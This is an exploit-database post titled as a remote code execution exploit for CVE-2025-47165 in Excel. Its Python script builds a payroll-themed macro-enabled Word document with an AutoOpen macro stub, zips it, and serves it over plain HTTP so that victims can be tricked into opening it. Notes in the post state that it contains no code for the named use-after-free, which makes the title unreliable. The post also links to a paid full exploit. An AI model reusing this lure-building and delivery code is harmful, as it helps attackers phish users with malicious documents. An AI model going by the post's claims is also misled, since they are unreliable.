# Exploit Title: Microsoft Excel 2024 Use after free - Remote Code Execution (RCE)
# Author: nu11secur1ty
# Date: 06/24/2025
# Vendor: Microsoft
# Software: https://www.microsoft.com/en/microsoft-365/excel?market=af
# Reference:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47165
# CVE: CVE-2025-47165
# Versions: Microsoft Office LTSC 2024 , Microsoft Office LTSC 2021,
Microsoft 365 Apps for Enterprise
# Description:
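The attacker can trick a user into opening a malicious DOCM file sent via
email or hosted on a streaming server, which then executes the attacker's
code. Once the victim has run it, the machine can be infected, or even worse;
this could be the end of the victim's Windows machine! WARNING: AMPUTATE THE
MACROS OPTIONS FROM YOUR OFFICE 365!!!
Note: the title and CVE-2025-47165 refer to an Excel use-after-free, but the
listing below only builds a Word DOCM with a placeholder AutoOpen macro, zips
it and serves it over HTTP; it contains no code that exercises the
use-after-free.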
```python
#!/usr/bin/python
import os
import sys
import pythoncom
from win32com.client import Dispatch
import http.server
import socketserver
import socket
import threading
import zipfile
# TCP port the local HTTP server listens on.
PORT = 8000
# Output names: the macro-enabled Word document and the ZIP archive wrapping it.
# Both use a payroll-themed name ("salaries").
DOCM_FILENAME = "salaries.docm"
ZIP_FILENAME = "salaries.zip"
# Root directory handed to the HTTP handler. "." is the current working
# directory, so every file in it is reachable over HTTP while the server runs.
DIRECTORY = "."
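def create_docm_with_macro(filename=DOCM_FILENAME):
    """Create a macro-enabled Word document containing a placeholder AutoOpen sub.

    Word is driven through COM: a blank document is created, the text in
    ``macro_code`` is added to its ``ThisDocument`` module, and the document is
    saved as ``filename`` in macro-enabled format.

    The macro body is a placeholder. The page supplies no payload, and nothing
    in this function touches Excel or the use-after-free named in the title.
    What it produces is an ordinary macro document, so the relevant controls
    are the usual ones: AutoOpen only runs if macro execution is permitted,
    and blocking macros in files from the internet or disabling VBA by policy
    stops it.

    Args:
        filename: Output path, resolved to an absolute path before saving.

    Returns:
        None. Errors raised while building or saving the document are printed,
        not raised. A failure to start Word itself still propagates.
    """
    pythoncom.CoInitialize()
    try:
        word = Dispatch("Word.Application")
        word.Visible = False
        # Stays None until Documents.Add() succeeds, so the cleanup below never
        # touches an unbound name and Word is always asked to quit.
        doc = None
        try:
            doc = word.Documents.Add()
            vb_project = doc.VBProject
            vb_component = vb_project.VBComponents("ThisDocument")
            macro_code = '''
Sub AutoOpen()
//YOUR EXPLOIT HERE
// All OF YPU PLEASE WATCH THE DEMO VIDEO
// Best Regards to packetstorm.news and OFFSEC
End Sub
'''
            vb_component.CodeModule.AddFromString(macro_code)
            # 13 is wdFormatXMLDocumentMacroEnabled (.docm).
            doc.SaveAs(os.path.abspath(filename), FileFormat=13)
            print(f"[+] Macro-enabled Word document created: {filename}")
        except Exception as e:
            print(f"[!] Error creating document: {e}")
        finally:
            if doc is not None:
                doc.Close(False)
            word.Quit()
    finally:
        # Balance CoInitialize() even when Word could not be started.
        pythoncom.CoUninitialize()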
def zip_docm(docm_path, zip_path):
    """Write ``docm_path`` into a new deflate-compressed ZIP at ``zip_path``.

    The entry is stored under the file's base name only, so the archive
    carries no directory components from the build machine.
    """
    entry_name = os.path.basename(docm_path)
    archive = zipfile.ZipFile(zip_path, mode='w', compression=zipfile.ZIP_DEFLATED)
    with archive:
        archive.write(docm_path, arcname=entry_name)
    print(f"[+] Created ZIP archive: {zip_path}")
def get_local_ip():
    """Return the local IPv4 address the OS would use for outbound traffic.

    A UDP socket is connected to 8.8.8.8:80 and its local address is read
    back. Any failure falls back to "127.0.0.1".
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        try:
            probe.connect(("8.8.8.8", 80))
            return probe.getsockname()[0]
        except Exception:
            return "127.0.0.1"
class Handler(http.server.SimpleHTTPRequestHandler):
    """Static-file request handler rooted at DIRECTORY.

    SimpleHTTPRequestHandler serves any file under its root and returns
    directory listings, with no authentication. With DIRECTORY set to "."
    everything in the working directory is exposed to whoever can reach
    the port.
    """

    def __init__(self, *args, **kwargs):
        # Pin the served root to DIRECTORY; all other arguments pass through.
        http.server.SimpleHTTPRequestHandler.__init__(
            self, *args, directory=DIRECTORY, **kwargs
        )
def run_server():
    """Print the download URL and serve DIRECTORY over plain HTTP until stopped.

    The listener binds to "" (every interface) on PORT and uses Handler, so
    there is no TLS and no access control. Responses carry the stock
    ``SimpleHTTP/0.6 Python/<version>`` Server header, which proxy and network
    logs can match on.
    """
    base_url = f"http://{get_local_ip()}:{PORT}"
    print(f"[+] Starting HTTP server on {base_url}")
    print(f"[+] Place your macro docm and zip files in this directory to serve them.")
    print(f"[+] Access the ZIP file at: {base_url}/{ZIP_FILENAME}")
    httpd = socketserver.TCPServer(("", PORT), Handler)
    with httpd:
        print("[+] Server running, press Ctrl+C to stop")
        httpd.serve_forever()
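if __name__ == "__main__":
    # Word automation through win32com is only available on Windows.
    if os.name != "nt":
        print("[!] This script only runs on Windows with MS Word installed.")
        sys.exit(1)
    print("[*] Creating the macro-enabled document...")
    create_docm_with_macro(DOCM_FILENAME)
    print("[*] Creating ZIP archive of the document...")
    zip_docm(DOCM_FILENAME, ZIP_FILENAME)
    print("[*] Starting HTTP server in background thread...")
    server_thread = threading.Thread(target=run_server, daemon=True)
    server_thread.start()
    try:
        # Wait on the server thread with a timeout instead of spinning in
        # `while True: pass`, which pins a CPU core. The loop also ends if the
        # server thread dies (for example when the port is already in use)
        # rather than hanging forever.
        while server_thread.is_alive():
            server_thread.join(timeout=1.0)
    except KeyboardInterrupt:
        print("\n[!] Server stopped by user.")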
```
# Reproduce:
[href](https://www.youtube.com/watch?v=CSb76-OG-Tg)
# Buy an exploit only:
[href](https://satoshidisk.com/pay/COiBVA)
# Time spent:
01:37:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>